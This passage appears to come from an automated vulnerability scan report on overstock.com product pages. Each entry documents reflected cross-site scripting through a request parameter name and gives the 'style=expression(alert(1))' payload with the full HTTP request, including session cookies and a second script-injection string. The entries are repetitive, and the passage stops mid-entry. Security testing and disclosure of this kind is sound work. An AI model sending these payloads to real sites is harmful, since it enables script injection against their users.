GET /Jewelry-Watches/Invicta-Pro-Diver-Mens-Automatic-Steel-Watch/1891965/product.html?244e1"style%3d"x%3aexpression(alert(1))"5a84823bf1a=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.434. http://www.overstock.com/Jewelry-Watches/Kenneth-Cole-Mens-Black-Leather-Strap-Watch/5206267/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53e6c"style%3d"x%3aexpression(alert(1))"3b13f50f14d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 53e6c"style="x:expression(alert(1))"3b13f50f14d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/Kenneth-Cole-Mens-Black-Leather-Strap-Watch/5206267/product.html?53e6c"style%3d"x%3aexpression(alert(1))"3b13f50f14d=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.435. http://www.overstock.com/Jewelry-Watches/Kenneth-Cole-Womens-Mother-of-Pearl-Skeleton-Dial-Automatic-Watch/4750508/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d13a3"style%3d"x%3aexpression(alert(1))"17e2300e9ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d13a3"style="x:expression(alert(1))"17e2300e9ed in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/Kenneth-Cole-Womens-Mother-of-Pearl-Skeleton-Dial-Automatic-Watch/4750508/product.html?d13a3"style%3d"x%3aexpression(alert(1))"17e2300e9ed=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.436. http://www.overstock.com/Jewelry-Watches/Maddy-Emerson-Freshwater-Pearl-and-Multigemstone-Necklace-7-10-mm/5197013/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90c87"style%3d"x%3aexpression(alert(1))"69b416373f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 90c87"style="x:expression(alert(1))"69b416373f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/Maddy-Emerson-Freshwater-Pearl-and-Multigemstone-Necklace-7-10-mm/5197013/product.html?90c87"style%3d"x%3aexpression(alert(1))"69b416373f=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.437. http://www.overstock.com/Jewelry-Watches/Maddy-Emerson-White-Pearl-Citrine-and-Jade-Bracelet-8-9-mm/3248501/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ce70"style%3d"x%3aexpression(alert(1))"9df2def3bae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4ce70"style="x:expression(alert(1))"9df2def3bae in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/Maddy-Emerson-White-Pearl-Citrine-and-Jade-Bracelet-8-9-mm/3248501/product.html?4ce70"style%3d"x%3aexpression(alert(1))"9df2def3bae=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.438. http://www.overstock.com/Jewelry-Watches/Michael-Kors-Womens-MK5055-Chronograph-Watch/5084186/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ea4f"style%3d"x%3aexpression(alert(1))"420bf962409 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2ea4f"style="x:expression(alert(1))"420bf962409 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/Michael-Kors-Womens-MK5055-Chronograph-Watch/5084186/product.html?2ea4f"style%3d"x%3aexpression(alert(1))"420bf962409=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.439. http://www.overstock.com/Jewelry-Watches/Pewter-Turquoise-and-Coral-Teardrop-Earrings/2552569/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 628ff"style%3d"x%3aexpression(alert(1))"af78b3026e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 628ff"style="x:expression(alert(1))"af78b3026e5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/Pewter-Turquoise-and-Coral-Teardrop-Earrings/2552569/product.html?628ff"style%3d"x%3aexpression(alert(1))"af78b3026e5=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.440. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-1-5ct-TDW-Brown-Diamond-Square-Ring/3671310/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d616c"style%3d"x%3aexpression(alert(1))"967c17b86a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d616c"style="x:expression(alert(1))"967c17b86a1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/Sterling-Silver-1-5ct-TDW-Brown-Diamond-Square-Ring/3671310/product.html?d616c"style%3d"x%3aexpression(alert(1))"967c17b86a1=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.441. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-1-8ct-TDW-Diamond-Flower-Necklace/4048632/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5685e"style%3d"x%3aexpression(alert(1))"34f79fe3a18 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5685e"style="x:expression(alert(1))"34f79fe3a18 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/Sterling-Silver-1-8ct-TDW-Diamond-Flower-Necklace/4048632/product.html?5685e"style%3d"x%3aexpression(alert(1))"34f79fe3a18=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.442. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-20-inch-Snake-Chain/2656194/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7fe13"style%3d"x%3aexpression(alert(1))"ea2c6a1c4f0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7fe13"style="x:expression(alert(1))"ea2c6a1c4f0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/Sterling-Silver-20-inch-Snake-Chain/2656194/product.html?7fe13"style%3d"x%3aexpression(alert(1))"ea2c6a1c4f0=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.443. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-Bead-Bracelet/567747/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce6e9"style%3d"x%3aexpression(alert(1))"6875eb762da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ce6e9"style="x:expression(alert(1))"6875eb762da in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/Sterling-Silver-Bead-Bracelet/567747/product.html?ce6e9"style%3d"x%3aexpression(alert(1))"6875eb762da=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.444. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-Black-Diamond-Accent-Buckle-Ring/4771446/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7f80"style%3d"x%3aexpression(alert(1))"e69cf3c4f29 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f7f80"style="x:expression(alert(1))"e69cf3c4f29 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/Sterling-Silver-Black-Diamond-Accent-Buckle-Ring/4771446/product.html?f7f80"style%3d"x%3aexpression(alert(1))"e69cf3c4f29=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.445. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-Black-Diamond-Cat-Necklace/4737276/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39c89"style%3d"x%3aexpression(alert(1))"68ec8051ec0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 39c89"style="x:expression(alert(1))"68ec8051ec0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/Sterling-Silver-Black-Diamond-Cat-Necklace/4737276/product.html?39c89"style%3d"x%3aexpression(alert(1))"68ec8051ec0=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.446. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-Black-Pearl-and-Diamond-Necklace-9-10-mm/3804500/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 937a3"style%3d"x%3aexpression(alert(1))"5cd5c7899c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 937a3"style="x:expression(alert(1))"5cd5c7899c0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/Sterling-Silver-Black-Pearl-and-Diamond-Necklace-9-10-mm/3804500/product.html?937a3"style%3d"x%3aexpression(alert(1))"5cd5c7899c0=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.447. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-Blue-Cubic-Zirconia-and-Marcasite-Earrings/4420243/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2646f"style%3d"x%3aexpression(alert(1))"9dd5125efc2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2646f"style="x:expression(alert(1))"9dd5125efc2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
